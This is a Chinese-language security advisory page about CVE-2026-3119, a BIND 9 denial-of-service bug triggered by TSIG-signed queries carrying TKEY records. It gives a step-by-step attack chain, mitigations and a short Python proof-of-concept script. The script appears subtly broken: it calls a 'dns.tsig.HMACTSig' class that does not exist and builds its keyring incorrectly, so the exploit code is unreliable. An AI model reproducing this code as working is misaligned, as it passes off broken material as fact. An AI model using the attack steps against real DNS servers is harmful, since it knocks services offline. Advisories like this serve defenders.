IPBUF安全漏洞报告
English
CVE-2026-3119 CVSS 6.5 中危

CVE-2026-3119 BIND 9拒绝服务漏洞

披露日期: 2026-03-25

漏洞信息

漏洞编号
CVE-2026-3119
漏洞类型
拒绝服务
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
BIND 9

相关标签

拒绝服务BIND 9DNSCVE-2026-3119TSIGDoS

漏洞概述

BIND 9软件中存在一个拒绝服务漏洞。在特定条件下,当`named`进程处理包含TKEY记录且带有正确签名的查询时,可能会触发崩溃。攻击者需要利用`named`配置中声明的密钥生成有效的事务签名(TSIG)才能利用此漏洞。该问题影响BIND 9的多个特定版本,成功利用可导致DNS服务不可用,造成服务中断。

技术细节

该漏洞位于BIND 9的`named`服务核心代码中,具体涉及对包含TKEY(Transaction Key)记录的DNS查询处理逻辑。漏洞触发的前提是攻击者能够发送带有有效TSIG(事务签名)的请求,这意味着攻击者必须拥有目标服务器配置文件中声明的密钥,或者密钥已泄露。在特定条件下,当`named`进程尝试解析或验证包含TKEY记录的合法签名查询时,由于逻辑缺陷,可能触发内存访问错误(如空指针解引用)或断言失败,导致服务进程意外终止。攻击者通过构造特制的DNS数据包并发送至目标服务器,可反复触发该崩溃,从而造成持续的拒绝服务状态。根据CVSS 3.1评分向量,此漏洞主要影响可用性(A:H),未发现对机密性和完整性的直接影响。受影响的版本范围包括9.20.0至9.20.20等,建议用户检查版本号。

攻击链分析

STEP 1
信息收集
攻击者确认目标DNS服务器运行受影响的BIND 9版本,并确认服务器配置了TSIG认证。
STEP 2
获取凭证
攻击者通过泄露或其他方式获取目标服务器`named`配置文件中声明的TSIG密钥。
STEP 3
构造攻击包
利用获取的密钥,构造一个包含TKEY记录且具有有效TSIG签名的特制DNS查询数据包。
STEP 4
发起攻击
将构造的恶意数据包发送给目标DNS服务器,触发解析逻辑中的漏洞,导致`named`进程崩溃。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import dns.message import dns.tsig import dns.query # PoC for CVE-2026-3119: BIND 9 TKEY Crash # Description: This script sends a signed query with a TKEY record. # Note: Requires a valid TSIG key configured on the target server. target = "192.168.1.100" # Target DNS Server IP key_name = "keyname." key_secret = "SecretKeyValue==" # Base64 secret # Create the TSIG credentials keyring = dns.tsig.HMACTSig(keyring={key_name: key_secret}) # Create a query with a TKEY record # TKEY is usually used for key exchange, here we craft a specific query query = dns.message.make_query('example.com', 'TKEY') query.use_tsig(keyring=keyring) try: # Send the query to the target response = dns.query.udp(query, target, timeout=5) print(f"Response received: {response}") except Exception as e: print(f"Error occurred (Server may have crashed): {e}")

影响范围

BIND 9 9.20.0 - 9.20.20
BIND 9 9.21.0 - 9.21.19
BIND 9 9.20.9-S1 - 9.20.20-S1

防御指南

临时缓解措施
如果无法立即升级,建议严格限制允许发送TSIG查询的IP地址范围,利用防火墙规则仅信任受控的客户端。同时,加强TSIG密钥的轮换与管理,确保密钥不被泄露。此外,可以暂时检查并过滤包含TKEY记录的查询流量。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表